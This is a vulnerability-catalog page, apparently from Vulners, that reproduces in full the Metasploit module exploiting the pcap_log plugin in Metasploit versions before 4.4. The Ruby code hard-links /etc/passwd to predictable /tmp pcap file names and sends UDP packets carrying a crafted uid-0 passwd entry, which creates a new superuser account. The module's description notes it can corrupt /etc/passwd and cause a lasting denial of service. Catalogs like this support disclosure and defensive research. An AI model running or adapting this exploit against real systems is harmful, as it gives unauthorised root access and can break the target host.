Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Multi Escalate Metasploit pcap_log Local Privilege Escalation

🗓️ 05 Aug 2012 16:20:44Reported by 0a29406d9794e4f9b30b3c5d6702c708Type 
metasploit
 metasploit🔗 www.rapid7.com👁 29 Views

Metasploit pcap_log Local Privilege Escalation through file hard-linkin

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  Rank = ManualRanking

  include Msf::Post::File

  include Msf::Exploit::Local::Linux

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name'	=> 'Multi Escalate Metasploit pcap_log Local Privilege Escalation',
          'Description' => %q{
            Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
            creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
            filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.
            This, and all the other packets, are appended to /etc/passwd.

            Successful exploitation results in the creation of a new superuser account.

            This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap
            files and truncate /etc/passwd. Note that if this module fails, you can potentially induce
            a permanent DoS on the target by corrupting the /etc/passwd file.
          },
          'License' => MSF_LICENSE,
          'Author'	=> [ '0a29406d9794e4f9b30b3c5d6702c708'],
          'Platform' => %w[bsd linux unix],
          'SessionTypes' => [ 'shell', 'meterpreter' ],
          'References' => [
            [ 'BID', '54472' ],
            [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
            [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
          ],
          'DisclosureDate' => '2012-07-16',
          'Stance' => Msf::Exploit::Stance::Passive
        }
      )
    )
    register_options(
      [
        Opt::RPORT(2940),
        OptString.new('USERNAME', [ true, 'Username for the new superuser', 'metasploit' ]),
        OptString.new('PASSWORD', [ true, 'Password for the new superuser', 'metasploit' ]),
        OptInt.new('MINUTES', [true, 'Number of minutes to try to inject', 5])
      ], self
    )
  end

  def normalize_minutes
    datastore['MINUTES'].abs
  rescue StandardError
    0
  end

  def run
    print_status "Setting up the victim's /tmp dir"
    fail_with(Failure::NotFound, '/etc/passwd not found on system') unless file_exist?('/etc/passwd')
    initial_size = read_file('/etc/passwd').lines.count
    print_status "/etc/passwd is currently #{initial_size} lines long"
    i = 0
    j = 0
    loop do
      if (i == 0)
        j += 1
        break if j >= datastore['MINUTES'] + 1 # Give up after X minutes

        # 0a2940: cmd_exec is slow, so send 1 command to do all the links
        print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
        cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
      end
      current_size = read_file('/etc/passwd').lines.count
      if current_size == initial_size
        # PCAP is flowing
        pkt = "\n\n" + datastore['USERNAME'] + ':' + datastore['PASSWORD'].crypt('0a') + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
        vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")
        udpsock = Rex::Socket::Udp.create(
          {
            'Context' => { 'Msf' => framework, 'MsfExploit' => self }
          }
        )
        res = udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
      else
        break
      end
      sleep(1) # wait a second
      i = (i + 1) % 60 # increment second counter
    end

    if read_file('/etc/passwd').includes?('Metasploit')
      print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
      # TODO: Consider recording our now-created username and password as a valid credential here.
    else
      print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added")
    end
    # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
    #	  However beceause the session is not a terminal, su will not always allow this.
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Feb 2023 13:47Current
6.8Medium risk
Vulners AI Score6.8
metasploitpcap_logprivilege escalationhard-linkingdos
29